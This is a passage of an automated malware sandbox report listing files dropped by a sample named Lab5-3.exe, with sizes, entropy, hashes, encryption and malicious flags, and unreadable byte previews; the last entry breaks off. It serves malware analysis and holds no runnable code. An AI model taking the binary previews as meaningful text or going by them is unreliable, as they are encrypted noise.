                                                                                                          Preview:1.bM.u.j>.....A.x7{.4..=.k.$.ps|......<f......Z...l.Er'^(:..a..M z.o!...~..D.o...).......e|.....k.@(.7b.bb..yV. ..................e............<.l....X.HL..Y.....p$..cUM..C.O.g.`...._.Q"P.n..d]_r..].I.8.......A..c.^F].I.....h.GY.'(.;D.0...T.....x..S..Wb..].a...1=.k.Hc+u#.u5:r.>...!.7.l.,F.. .......]6.Qa..V....Nv.gE..L.h.<.t"...%...p...\.../.bk..[E...C..0.....7.....'..T..D.',KLj..ke.........p..>.......h.W.T.....)...$......s.j .(.U.l.X2..R.1..........blzp.K.ch....+.2...%.<`....;.s}y.x..~>.....S..}MHS.....]1.7...0.......L...B.R...N...j^.K.k.+1\.._.....-..74.B..>ce..Y..D*..@q.R.N9.|>.....W.w.Y..I.K.h.Z.T..H.`.{.I......B}s.....s..{.qg.....@.k@m.xw@@`N5..WC.......5.A..l.u.6....vh.N.......&g*X..E......7.A~....I..gH..{.M.J...i.p.....1.B..`..MN...u..r.<c/..:...S.)h.Y.".-...m]*.....v2..f..m.P...j..=L...6.2.8...BY/=.e.%...BF..I.S.?.*e)......A..9t..;.....v5......!...&|.Ao..d.2..D..........u....L..{.[1t..., zz,.6\...!4v.\Y....K..;...H..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):84224
                                                                                                          Entropy (8bit):7.997820211593964
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:hpajasx5pvK84feXlOL4XreLl9JemdD1HfWNJ8iQWsfUuZ:jcasPJn9SpeTNinUuZ
                                                                                                          MD5:6FE1EE0172246A0CF501E005F4CFE473
                                                                                                          SHA1:5AD73914542949E8DE6510FDE548E96C3AA75269
                                                                                                          SHA-256:CBBFB313DC6215B712D2687893CF6A23735546B61C3A96C3DE8CBBF8CEAF2AC5
                                                                                                          SHA-512:89DD1787CCC37FB9BCB3FD853F9353A710D4E9AD0A107897F70207070C53227EABBFE213C33DA2C659D30CD6A03E7D2F2093EBAFAB86702D4363A759E6C6063C
                                                                                                          Malicious:true
                                                                                                          Preview:....Ui.m.u.F..gf}5.H.,.:.e..}.....ZI>....Y..N.a..e ...1......89b...:... .U.7..)......G.5j...o...%.8...m.5.i...A~c^.<..&.3.....J@9qP.R.D..gmmd.......S.."..H..S....]..VpF..7..V.../..~A..#..:.F../..Ep..Xm..u..dv....k*..$.....7....dz./....5....|...C.RfM..sDzAg.....Q...2.._..>n..1....)j..1..!..1_E..<.-..M.....H.D...`.[QLR2..B..EJ..-.f.r..P1.....6..1...>...ho............'.?...W......=...D..?:.S...q..,....Y.^s..0|.@i.O..B.mV6...O..fS:p....-.....^.J(U..O.....V.O_O.....(.81..;..r..Ce.Y...g...O}....)...+....:.v{....lX...*...$}AVi.:.Z..u..w...w+R..................tQ.b.0.o..1...(OL....]s.c..G..I..4bZ..^K.h...../p.R....W=...%.....K..\.....nK...[..[MA.....A.Y.$)\...k..y6.1Tim.m.1..]...ACk.v$..@O.x.z.c;j..[Up......z...+p!.....h.....Z.....83...l...p...6.X.<g."./...y.Y+..BZw.D-..*8...'..ve..L.}.%[..._kSk...pUq,>#...V.b.|..1...Fi...0..\....ag..j..b.....9q.?.C....F......K.."D.k. .....p....wH.[.!W..W.3$dr.1s..mx.*O.W.k.3/.w'5.c.....+xn#...F3'3.3m...M'..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):36736
                                                                                                          Entropy (8bit):7.994320975815635
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:X+66SqEMBFzMoJUsD/4qOah3aH68uDQUO0+zSCQCX78OClcZ:O66Lx+sDr4RZhG9gJCOZ
                                                                                                          MD5:D5FA9670CD9CB3865AABBF68BD52FCE4
                                                                                                          SHA1:6F767F4998DE5712EB29F4CE068FC3D0FCE9F3E3
                                                                                                          SHA-256:975B3890D07DC8C4249B0DDBBE43EA35F7E39597945764D3C76FFF233E44DD3F
                                                                                                          SHA-512:B20896804FC87BD356DBD082D05F2DFD9BEFC034B3E409B9BEAF0865666A1116F71915D07897BB118470EF1EB8612D9F6DBC72D899BE4A1E588F80628EEF6E28
                                                                                                          Malicious:true
                                                                                                          Preview:.]...a.;:.,......~....3Vl......7....q.....2...........d..[... .......2....c.#.;..gx!..h5.O....Y...D...&a..f...4..;.6....r..Z......zN..z..m..aK..W.f...a(.bg.......npK9...K.&H,.......B8...]zA2...t.p./[...;40..=....]1s.~$.{'......9..D.R../....|.........'.H!*;.{J.`$..&..K.%H...*....9...d.... ?.H...x.w*..|....2..#..8...L.@.!..7o......{....u.?nAh..MBHBe.[[{...?BnE....;U._.A.Ry. .r...|T..1.X..7...B.d. ..V!6.Q,.7\....[.Q......FPd+.)>..QR|%.....m.Q.1.....y=a...+.....<P.Cnzt'n..Fg..*Ed{.:...".B.Pt.J..;./<.ky...!..+...R.Q".M3..HQ;.b.......l6.&o.....2M.....1....yiej..7..<.....n....eAD..o.Gr<...."s.H..c....fB.aX.cx.t:b>..\.F...;.........UT.I.V".e.\-..U.....~c.S.pA.z.gE&......n..V...?..;...l..,.....Wr....5OC.L.3T..[.....d.f5.Y $ry..y.].;..........._1f._*.x.....M[..|...9..L.}..}..LM}..F..C.4>...HT...F......4..F..X..Dy.A....iS-2.-..;...$ p.Sp".dEK...}eg......#..tX^E....2.9R.[...)lr.V... ...d.c...M....y.[_~......n..z.......Y..4....%C....j4qwL.$..z.Z.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3920
                                                                                                          Entropy (8bit):7.950262165009713
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:RZhVfes590kOjsdqQ1r3ET1ggyZaP1OYHq15cUGx0uKeY2ElUJ:BVG0+XAzmkaIE70Cb
                                                                                                          MD5:902D38AC96560599F519CDBA60AF8807
                                                                                                          SHA1:7D0C5338C81ED95F781737BA9D7127F4E07A380A
                                                                                                          SHA-256:82EE3F5B044AAAEE71FC2F388B1B83CFB466F6BE8D454295839E6CD1F7A27F3C
                                                                                                          SHA-512:D35CE53F3DB75D5E7F59E8844333864D1817F4B3782DC47953A64D10FEDBCC23637223E2DFE8588E4A9B70A30EA1A28EBB3984A867FF73F2D77E0B17394A3F1A
                                                                                                          Malicious:false
                                                                                                          Preview:...@.m..*4.....mQ.....yVH.'.5.SS..;..g8.B..H.W.%...].q.=.&....rR....1....<|....,.N.....h 5.Q...m2v{.!"..F.......u.....z...`..H.F..IN...M..=jb.v.c.a.F&^,.....J,Gt..X)!......n5J.../.>.=;........tj.u..[..x.........z1h.O&......x...>_..<.%..J.......X>g.n.....>....`..29f..e.q.....1v...d5.....-.8=`.|..tD.MT.Ic.V....T..'.b..C..R~C..y..w<T....[$O.8.z16j[..D Dq...e..R7..........9..)..n..0..\....B...I...Jcf>S.#D.~s.....(b.......2......z...8..2...s.J..0.Q...]y.s...4m4...s..i...=R:4.1......W./.....R...=.jC.....=.,xw....j._4..s;..Y`(....".Fyp....6...%8.....P9.'(./[.D.ySb....N.!:k*"..CS....e?f.I...f......RR'a.c.r$Q9.g.j>...!.{Cd7..RRg.1(..^tb%....32..K..5'..y..F.sMs......k..!.?..n.h....Kk...%.$.K@."1..m....r...G..h....,....vn.Z)...r.Xg...G%...~.n.r.<\.t..pB5.#.,.Z.#]^...6.........Z.f...&6.u.!.f. ....*.......Z....Q)P..3..l...9<...>..z..P.:&.P.C*.5b..H..(}*.S..J..*..I...DG..h-..6.#....{.M..I.k..)..2..3...4..35C.F.8&/@R.$.\.|..7h......<..y...\.tSo..5...7W.q..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8368
                                                                                                          Entropy (8bit):7.976954132644117
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:EQaWGB8M2OtmPN365kBsYqlRq5PKzx8JQ0Cb:NaW65cF36Cy0PKzx8JQtb
                                                                                                          MD5:6E1DF2A935F0F86B84A0C82F5C6DCB4F
                                                                                                          SHA1:2F6D1B7B213CD75AA90FBAF4EDD836D1E673EC9E
                                                                                                          SHA-256:505FB50C2B76E2A9CAFF827544A97C9384F4C54BC745EA72EC83806D2B5A7DC9
                                                                                                          SHA-512:D59DE2681E0050961B56B5812C6A97141A597CB099CD671680DA10E2C99088134B0AFF738653590D75BA8EAA976DB3C3ACC8AA4B1B672C4FCF8372FD4BC7D2E1
                                                                                                          Malicious:false
                                                                                                          Preview:..pIN.qo.............\....].'..8..X.ww.3........j2%m.`..%..+0. .t.O^..Z....\..T=.....c...1."%b..z(.....U.7......AT.e.Z..#.C..|...Io...P.t...jm$....U.#....UG..`C..4........Y.....8...7....v.".U......=;..~.Y..W.,.H..........n-;j......!V.]..p.C.=......J..R..xB.I.g..GQ..t...O.O.*...b...H....G..K.+..O!).I"=#Mj.....R9........Q.u-...r"....Gl....,..Z7...CI...c.t.K..Q.i.#.e'W.$V.%f$wG..0{a1..6.<..,.1[..~.[I.)..=....G.U.A._wZ.k...$$.h.-.;-S..OT,q..../.......b9...p*.'..9v.)..u....1y...H3.@.Z...]cV..Z.....~,..?..r.|.5DI.....]U..B.T.X.b...u9..BA.z].....W..E.Q.Vd....)...cJ}UN.>.0V.bShj.1._..d.G......H....-.$.#....M.e].NC.....f.H..m....}.,..'........pH.&.C..oiz"..&.I.A...T._...@J n.b.9f..4v..P.....~....rl...........:%.5....s.'J..i.&_...W.9:&>..;Q.F.5......*^...1....l.y.).[...........:...I.<:...|.h..\... ?P?.-.....Wl..lY..0i\i..|..N}...*..;......}..l.0.3...v(|._6..f......ut2.x.O,s..u.!.N........9.d..x..S.j.*..\@......Z:.r.j...;..........8.E.u.Z.$Q67...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7280
                                                                                                          Entropy (8bit):7.976331944638021
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:8aPqk3JqmymctWNnQyYMFDKDEJ/4Lxp4F9Yroo+/JcSQLHoCJp7QC7NazHBGx0ut:8KMactWFJrRSX4DUos1LH7l8m0Cb
                                                                                                          MD5:0D0627D13590B385A2BD48E202E1A36A
                                                                                                          SHA1:DE23DBD783DAEB2479B917BC7F1E418380ED68DD
                                                                                                          SHA-256:6480697308707F949C4B9B0D24F2C35A505E620413BBA73DAB99DEFFB15CA4C7
                                                                                                          SHA-512:B74F368E43426EE3A9FE0FCFF2F1BFDBC1586E87043D7039BE684F842F48FF713FE197206439D9C3AB19A5CD7E88A9D2F23876611A89346BE658B3A54BA2B714
                                                                                                          Malicious:false
                                                                                                          Preview:@.4.......n....y.....y....=...v..{...@.;..xI..z..i..9$.....Eu%...8+....h.....{.....-!.....>...i..?.g.,b......-g..r..x...7+Aq..X>........B._S[...8.%..h../.{i.../....{X}1..,..(.).Q......Y.@O._B......x...............7.`Om8......EH&.I.n..+....N.....TL.....T.+x.F@.Tf..D...%.*`...A}B37..|vY....}6...#Q....jx....}I.-..X'.,.we..(..;.m0.Z6O..Qs.P.)4*........+rg.T..]%....}..]..&.6M..W.97D......q.n`.......FB.`(A`...~!........M.~&..4....-...........5.....V..#}.i%....p.....!.?.M.D.........O...j...Z.+d.n....k@...../.~D........e4.r.,.......<.ssxN...j...L...<}....Cv/...../..Wj.>./qDA...=.m......$y.OM(\....U.)~...(..i...X.LS.uQkO.l..\.'..`....`..g:&..E..*._..=.~..lz.v...}../@}qzc.z....Z.#.7Ez. 1.2.b.n....".+;....JG..R..k..w.@..............0......9...\......1...3.......E'.....oY.z.B.[DX.Qj1..h.H[.^_.A.7sn0.g.....:3.....yO......Co.Z..X....E.i&d.Q....q..d.&....3../S.......?....g..k.Z.w-@?...uU...c..0....0.<.o...V&.lBt.'..Y..k.q.P..8.v .>....3y.M.<z..w[
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):22720
                                                                                                          Entropy (8bit):7.991039355410395
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:FoLpBxI/8axl46J9h+jQX4y47q5kjJ/3urvoqaXUYRTixU8S6lJGf3VRtb:NEe4yeQX4y475BeLjbSiK8jGf3LZ
                                                                                                          MD5:6148100CB70E194CD7FE6DCE0766DA8B
                                                                                                          SHA1:7830976502D380960872EF731527314E123FD3B1
                                                                                                          SHA-256:6146885780FAA19A9297AE24EAFDE23B50C2D8D454BDBA2322AD7C366465B6CA
                                                                                                          SHA-512:CB2EEE5AFB0AE25FA426971EFCA26CD4A6ACE2E4A797C88ACF64934E3515CF3A9393B4D1961D6518F9711863F096B2FD6757EF604E795FE26E6C3626F45AE7DA
                                                                                                          Malicious:true
                                                                                                          Preview:5^^.|........f!Wp.o.&...mp*v.z.*.i\A/.ZD.`.b.....B.K...G]........H...|.~....Q.....>...&...%/Sw...bn.[..xn.g.$.KA...F..[.3.J.B..k..r..)%.R....I..3..J...Q....j....P.p....,q..].)9>Y..=..W.G\.2r..6y.'.GG...E.4.\R....C.A...fd.}..W..8....Dz....`.....1J.A..E.2W+f...(..Eg.0......iUr@.$Db.x...MO.g...J).....[0.i.3Oh....3..3......H..{..^rJ@=...*M...8#........s..L.4A&..>......v..w...x\.<&\.s..=ixW.4.k.g.T2H<Q...,......:...ksW......z...+.OEa...=.**c.].....S6....-y..y.VdC..NF...i4a....j...o.b.~..(.R.9x.O.. ..A.@J..a.p.y...AcH.-A..yi....C..... ...8>.J....8/..Z.Z<..[..qz....u...O...3@q........1QV.o.YzY.....w]}.K.,...Q...K...;t.7..!.hh....Q.Z.n=bx..5...z... Z...}..JT..h.o...=)....J..:...X.2...x..0c...U.:.b.3..E..3L.p..Tb ....xG..g.....w..Y.!.i<....C.,:.....g...*..uG..t.."....$,+p.!..:...}6..}........Kn....{..=..v.?pV.> ..Z5..;...9..t..q.3.ph.....'r.Y.=.....g.Tx{".G1..wk&A......i>.m.F....%Q..\.B)r.+..[M....t.o.|..t......UL!.....$.H.`+...w....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12288
                                                                                                          Entropy (8bit):7.984462665438622
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:p28Z7VPNdutrBkWpY+VLNvsnOfqMz++DMTjRhnResrd4eMqSB3NNJhzn30Cb:I8/FkttdYcJvsa5z+nthbrMXxNNJhj3Z
                                                                                                          MD5:E384685283104B887158A2FAAA9D48AF
                                                                                                          SHA1:97DA46B46EB6A998969DD93767FA3ECB8D274102
                                                                                                          SHA-256:56CD21D338504096B963FEEB23B536F2548926185559E96AB3CA4DC9138682F7
                                                                                                          SHA-512:DDA9D5124FB3F8D6A7409E6FBCF131D8B1C8E82260BFFD924FC3B7004E2173004A58E626231F6CC4B380FCBC45D346B78EAC971EB56B44D4D354C3439D7DE15D
                                                                                                          Malicious:false
                                                                                                          Preview:?...s,......7Wc.........8......^......E.u.. ]....'\.{.U..'@U.{..lk...!.........,..l...5..p..f.7...>$.....M...M.$.....5.%..f..9[D.!...!...........F...T..-.:%]..F..O........k..Sf...=.8.q.....Z.......^..+`...r..i@............,..AX.Q. .....k..;.B3."..l....<..............9....Dgt....-E......y.m.Mhr.N..!.{A.....8:x...pz.^.:...=.Y.v8..V.-$b.n!1..G.......?Qp.2.~..h.5}.A...j...W.p.xF?..#.a9..`....H[.F.......c..1....-'_....M...'..vc.Kt...r.....n"..2i..j...2.....k?F.n..1..;.....6...J.)y..8....N7.lD..+Ozv>4....C...x...<.VSl.e.D.Sw..r~b7C..b5...x...a...@#..>4...a...G.pbK.uD*...w\|=....+..VY..K{?...QHJ.v....=;.^?w..?.80.S.r.o..5...s...F.h"....:.G.Q.K..i..Io..3.._<.+.|.S....s.. ...Yy5...>.;hG....&.|P.9.*..t...uE..;S..KR..........y..K..D...M.p.c....Mx...8....j....O.....39.)6($.. cf.=.A\......l.N>-X..G.A.Q...m.......a.....Py.^....{e..>DO....,_...~...#......~?..i....e..(...[..l..L.:...F.. |...d../..2.2l...T.WX..y.....,.9U.H.|\..g..N....wr.+A......2j...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1920
                                                                                                          Entropy (8bit):7.906338863832653
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:LZf5XWMWVlbbkzHfUTid3hBaUoSGFcmeykEdEElU92i:LZf5XWMWzbrGx0uKeY2ElUJ
                                                                                                          MD5:D4B6C69BFC72A57D66EA204E84BF197D
                                                                                                          SHA1:03BCE82D5C9477FC369980D427D860A3C3D73798
                                                                                                          SHA-256:3E6AD8B5A71FAFE0000399B338C29EBA91BE3E90B9534DDE21CE8CB19284E07A
                                                                                                          SHA-512:1F3E003A89B9D372FBAE66960E55A8EE59D3EE34FA438D6C595D6150DC930C3202C33DBFE638C8B6B29892DA1129424DE55422B26A1E29935A0CD9E30950C022
                                                                                                          Malicious:false
                                                                                                          Preview:j,......(w.Ks.+k....a.{T....m...".'}e.....by...y...Ls.{..Xl.Q./.F.%Tc~E.C&P.cA/..4";.r.w...B.D.O+....G.....B./..,jLy.....%.m6.y..c...o..... Q. `B.N.)K..:....q4..)...M..V...<..|....L.....'."u.....A@..,...N..#.r.-b..f.$.{..@.<3'.k.n..^x......O6..X./R.tH81.C.]:.i..).. PF..~.UF.:..u.u>M:uu.';...T.\...C..b....r_n).Nm....=.w-/Z. a..V...Y.wn.."M.8...H...3G..1....P>..b..s...NX......|..=.....g.Qj"d.L.2..1t.... |Z.'.{..!U.TZ."[XPVD..g.....VD..C.J.?fU>....j.......i....x..Zs.d....0...............p.s`..4.'e......O."w.{x...$Vy#.aR0d...6....e.|......w.<.:.1...8..atd..G..^..6..W..G........T.Y.A~..m6+X...J..f..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2256
                                                                                                          Entropy (8bit):7.920593103263517
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:YN8ANe4g4WGNkjDT3GJjflHfUTid3hBaUoSGFcmeykEdEElU92i:YN8AY7QWGx0uKeY2ElUJ
                                                                                                          MD5:97F14B7A40712919ADBA39B665A8979D
                                                                                                          SHA1:3834DC4D18A0BB6CDACC8D671825CECEE08E4733
                                                                                                          SHA-256:757CEB65A5A5F6E5351D9209039C0C3FD91B305D10E0C9E71DE5A1D232C20C45
                                                                                                          SHA-512:6BDBBD1ED322E898FD9856BC4E75D976DFAB25B2F0FF076A57E97CFD51707183BB23DB858FF518D877A3DD957A095E6DDBE6C2F4AC57300E0E463A14302AF0E1
                                                                                                          Malicious:false
                                                                                                          Preview:..Z.z.....9..".n..(.S.Q....M+.U'_..f.O<.VO.....h..d:p.....T.....Q].A.. }_L.x.w.p ..xP... DX0..C1....SK..h.....}......n......$.L.^.Z*...d$...y^h..c....%.....TvL.'..F..y`...!l..A..H..6..*S....S..<-v...a............D..T.'.G.&........&.. "h..{.......r..Y.`...;.Y;.....A .k{h.}..3...H...8.k@.S~lr....B..>.:[...K.....w...KY.`1o....P.E...q.:.k.v....\.v...h.V...@ ...^..c...t!...Za..^....|.f=..g.e.I....n...-..@$H.~..7.<-G...%.2.B...9-.K.R...`6....s}..Nch..|..,.7..+..2.i....W.k.k.3xS.s)..1>..<..1..u..v.o.$.........r..F.H<..9.;u......<uK.....^@..^R..5..',/#(w}0H,.yC^......k.r.\..t........3.S3..../...>T....A..}Z.L...5.E5Kd.q.=G'(..|.I..,.o.....tS...Kl..........8....RF ..7....E9b......F..m.2.4.u.l.......T......j.6.2..6..,-...Izw......\V.L.B.|..;..1+...7a...!m...rH.$....0G.M&]...2o..?t..Y\..z.q+.....C$D9.S.e.h..:...N......i..Y;..Y...W.#..D.;.....!9..;d.0.Td.v8..*%.)zKg...iyD-=H.....:K.....yw.../.f.,......v'....^.Q...rp....;....M....R...=(..(ch
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9184
                                                                                                          Entropy (8bit):7.97749757263128
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:8vaek2chVbEMov5lLoLSaJa3hHltBFjgAWo/EWf52KkKH10Cb:FV2mEBv5KLSaJaPFUdo2KN1tb
                                                                                                          MD5:62151EFE619C13351C428EB744F8D3C7
                                                                                                          SHA1:FB297FEC4928DDFB88691391A2643DCC1F11D074
                                                                                                          SHA-256:8CE70E4569E1672CD44DAE3BC9721E9302E44586DD0FC87DBAF0FED096E92DA8
                                                                                                          SHA-512:49FD9208BBB00320EF64635327B44EEE9BC3525085F8A8A6C70CD27D4946E65B01C105FF0E992C5F7DEEDBD1E53DCE595E416D9595983AE186DF5B956944E6BB
                                                                                                          Malicious:false
                                                                                                          Preview:...#@.....d.W.e..1..mV(..m.......%o.J.d...._C...J...M.........ww...9...RK....Si.5\..?.E..0'.....T.^b.z...b...{%&g/&..#%.% ?........P &.M.R\..)W8....`.....&..........$......b.iK.......f....9...n^.+..j8nDp.<A..zHx.|......5..L.[6GbP..@...4...5...+\.@q..cF{.t..c..3..m/.*r..y.}0,.?$.....KT.">.lD...x.........U...\.#i]......d.]....4g.g9.b:.6vN{....bX..5...v..:#.S.hE..td..%u......8.(5!.|.t.7..{..`J.c.."........~N.;..e..&..U.,!OF...DMv...T....#9...;...y3....A.R.`T.H.h......@Sw..>.-.6...Q0%.We..-...I.10.v(a..%;.s.H...4|...&[.....}.B.>.7.:H....@.v...=..^.....^. B."_.Z.......#o.c...=.T/H.......z%.{....C....s.u.6&..,~.K...Ob..E.kU...k.......a0..rS..z..7R.....{...T.A.%.<..=..G..+C........&.?.Dv...f]..F~.}...$..r.B.[.z.X.T.a.. d....C..PD....rMI..S... 37g...nY.H.Cd..h..r..C.!......mQP=m..'+......_....2.xJ\.U-)%c....._.n6.......k..5.....j.....).[.V...j..F.Nj`..6}..BYOx_......B..D.d.i..X....m....~(....y\E{..3...*}...Mj:..$......'....A`..F....*........8.y>5."."
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7184
                                                                                                          Entropy (8bit):7.975729555845208
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:y9cLlfU+1UxAuYUV4kCd/qlXaKhflQ8Pm10Cb:xRNUxAHDkCqlX9Fa1tb
                                                                                                          MD5:C7C6A20C096351995AF1913AA3A25930
                                                                                                          SHA1:AD275F290B33985E9C2D3EFBD059E1DB64C2A31F
                                                                                                          SHA-256:46D976D1AC403050228DFA82312483D7FA3FB8D32510A6ECCEBF26186B7D0E15
                                                                                                          SHA-512:54E0B29F3E529E2D7F8E52B74DE78F40B5E65C169D7488F7C25BAC40F9016345B02A6F40A33E62FDD7272357C7298C2090A7662AF43B74EF32F0EC29024752EF
                                                                                                          Malicious:false
                                                                                                          Preview:..........n..$...|.+Pc.q9..J.[.b.G.2.S.@.N.8 .L*..z....}f&]..E.XwQ%.."......M...q......y...hb....g&..F2.]x;`..W0...l. T.(....f.Y|V#Wj....o.O.:.\8.4..-.I.N..)!'.C((Y.....H.'.}j.. Sf..8....<.A..U..?cE`7s.....S....E+6.v..V..u.4.....Lh..O........'.}.... .....w..7.jW..S.......O..=#B.."}.%..#)L.Z..<.8..M.!..>..5i....@.............}.s!fX<.o4..~.&")i.9A.........Z..?._3..=....3f.b..[\...c...h8.@.3sI[...C.u:.d..lww...D....5..e..Xk.ak.@8..R1...3r.z.C..f.\l..+.w$..^...x.{.y......?^.I...d.M..s6...-y.....8(.!l..s...D..!../...t..."...x22.VO.+.....1...v..`...@<|.....z..UH.w}C...-..O.Y.!W....cv.R.......d.....I.J...B....2..!...u......t..yS.*..D.3..*..F..2$......G.w.ETP.o.../...3oO.{....%=...ITT.2..G.....=.Y..._S%J!.A...19.2z.yw.....%....9f.X..N...8y_.O..g3qU..D.<.k.Bs"........-F...FF.L....+.#gS....Z.._gz..?T.'.....-.D..tcH3.1..p....|..a..`F.@._..4..(.^8.."S%...i2y.....c....^qO.y..D.!.3.*.K.mh.)OE.@P}..A.e.?05..F..RO[...D.s..kR...T.......R.3.....<.PC.w....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7312
                                                                                                          Entropy (8bit):7.975976510517999
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:OkD+bjUOqO3Ks7VOdA5kZGCDENYKON429vdYczvlYYYQMoHRoktfGx0uKeY2ElUJ:Okibj/37VZ5kZo1ObZdYcJdHzK0Cb
                                                                                                          MD5:AEC65BEE20C2CA73A3869CE424B0A11A
                                                                                                          SHA1:59BF32329FB86D14A7B1B592DC89C89AE086F620
                                                                                                          SHA-256:6810416793BC2BF1F34F569A513148B0E41D539D050667D3BF8A8E3F97625672
                                                                                                          SHA-512:1CC4E13895B32DB4527A45D62DAAAADAB597C15FB3AA13B55E1DC8686DD33A20FBBC2F467C7EF93D5590946044D91FC71830441E17653A344B8FC5D7241DD130
                                                                                                          Malicious:false
                                                                                                          Preview:...MW..eL.f...T..qT.21X...}.m......6.....;j^.......L.G......nQjiT...RI.."P..I.._g.).....u.g....#..o.i1..k................I ...U.........nL.d......f.L..I.YB3<.~.....L....Cl....E.....#W....6....G_z.......k.1^..[j..].k........J......".k..n'.=.:I.K...o.. z....idx9.a....&|)...&.....~M..../.Z.....M.....sQ$.ky#n.&.tV..u....G..cDs..PS..D.F.*..q..(.... ."L.wu..L.lM.._...j.............FeM...../..W.}.x.}....8..]a......Tj.9.Q.u.p.......1..y<..Ym5_.bB.v~a..?..5N#l..<.9...8.AwUC,.=.c!.G......BGK.'2X...W-^..a.|z..r..N.%..<H..Im.?.X.^w..<.P;....Us.!....<c.....z.0..0P.......Az........:].\;...yM..zb............>-c...w..e..:m9.>.I...'..*.!.1!..m.j@.Y...w..u7.w..sN.`P....../F....uL.K..J..I.b..j4....]7.B.T...&L..iJJ...[...$.+...[7....~...8.U.....,.f..b.op.tVv.b.wp..(."2g=..6.........t...Bn.3@f....lJq].....l;7....L..V..}G..xG.".[F+.%./&.P8k~...f?..V>.g...._.c...w..J....c...Ab./...r.....|~.....p5z8...gs..sP.-ae..3HZ....y.[..#.z.;....h{. .}.B....5..O|(.....}....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):44928
                                                                                                          Entropy (8bit):7.9965088046743995
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:zs+K2zwpeJhaFLRMAmWcjzApdRdaFYqEKV5H9wqYdWl9RtX3CZ:w+PwGaF9MlWc4pmRE6Z9wqcm3tX3CZ
                                                                                                          MD5:3A58D842C82D525F2F0CC60627425B78
                                                                                                          SHA1:06AFE5373499A9C1E314161E35B462CE6193C7C4
                                                                                                          SHA-256:D4012A9C4F1BC038342768CCC72436ED1465DE5F5404F5F3E9B40B7A596CB664
                                                                                                          SHA-512:3C491CFFE269119968FD9ADC978CE0AE97A878A482423478FCCA2C17D102F77B7F684155E5E42E314477B856C6C4B0AAE4FD104F5CDD1245856660E982268075
                                                                                                          Malicious:true
                                                                                                          Preview:...p..t..q.D....\.&.wo.9.... .....a.....3..gz`tX.|.t..)..2..9R..w.k..e....</R...2,.t.XP..C.-.w.. ......c.._V..mC"ZQ.rT...r...g.I.j...n?..gi..VP....Z^.q...(GP..]J.4../....,..........C_'BO.5.x.;z.9.b.8."m...q.p.......o..M..q..t?.H..5..~...R|0|U..7...y..5....pJ.........*.&..<...'..../...^t..+U.0:..L/..k.h.........G...S..`..,..#..f....".+.......3..,RW.,.s....=^^...5!-M.....?..<....[1.Nn...7....i.....Z.".R...bc..z..Ad/e.....Uz..VD..."cJ..|=$..a..b....dL...%.p...{;bL....Q..Ut.j..s.n....xA&.r.....@...,l....,B..8zg.)..uT......J..b.p7..Lx.D...Z4./..0...........8..)W...F.P.E;.7.`.0..F.].,......?d........!.....a.)a..xp...(...`+.p....C.b.......c.!.+/<...`/.-...G...F....0....C.$.}D.i.D..Fo.n...,.37. *..,.8.....].gd>A..=..FR.h...._..+W.v...w..q.~l..a.8<.?......(aVu.!8.?.J.q|..*.V|w!.%.k~.=..X.s.gW.E.v.%.+.RF......t.PX.Q..;....s.........z@[+.8..@].<..;61s..xm.U.......&.. 0....^)7guc.>W(../.4......dd.Z..oi..Z2..c.{.N.......#...Q=..;3q.p..v...!..a%
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16624
                                                                                                          Entropy (8bit):7.989797468547757
                                                                                                          Encrypted:false
